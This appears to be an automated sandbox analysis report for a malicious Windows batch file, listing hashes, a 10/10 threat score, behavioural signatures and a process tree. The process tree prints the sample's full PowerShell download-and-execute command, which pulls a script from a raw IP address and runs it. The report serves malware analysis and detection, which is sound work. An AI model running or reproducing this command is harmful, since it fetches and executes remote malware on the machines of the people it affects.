Analysis
-
max time kernel
66s -
max time network
94s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
05-08-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
06b926501124d92a036344bf241649d7.bat
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
06b926501124d92a036344bf241649d7.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
06b926501124d92a036344bf241649d7.bat
-
Size
220B
-
MD5
1f1b4ef469c59f64bc350fa3049fb232
-
SHA1
3415fe4896d99fe99f439347fdb4aa3fc2ce9358
-
SHA256
b90e099ce246bbb92781c5426491b3def2122660c546f5ab93aca4a0baeb1edd
-
SHA512
93cf23a75fd96010e5ce84107ab0a86013775aa6392c1218611b7538c9abf2700a13998325993cc3ae1c95d23a680df37b70cc2b245c04fd5aa14bf185696399
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/06b926501124d92a036344bf241649d7
Signatures
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe 608 WerFault.exe -
ServiceHost packer 6 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/576-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/576-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/576-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/576-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/576-6-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/576-7-0x0000000000000000-mapping.dmp servicehost -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 60 wrote to memory of 576 60 cmd.exe powershell.exe PID 60 wrote to memory of 576 60 cmd.exe powershell.exe PID 60 wrote to memory of 576 60 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 608 576 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 608 WerFault.exe Token: SeBackupPrivilege 608 WerFault.exe Token: SeDebugPrivilege 608 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\06b926501124d92a036344bf241649d7.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/06b926501124d92a036344bf241649d7');Invoke-HIUNLHOBGPFML;Start-Sleep -s 10000"2⤵PID:576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 7043⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:608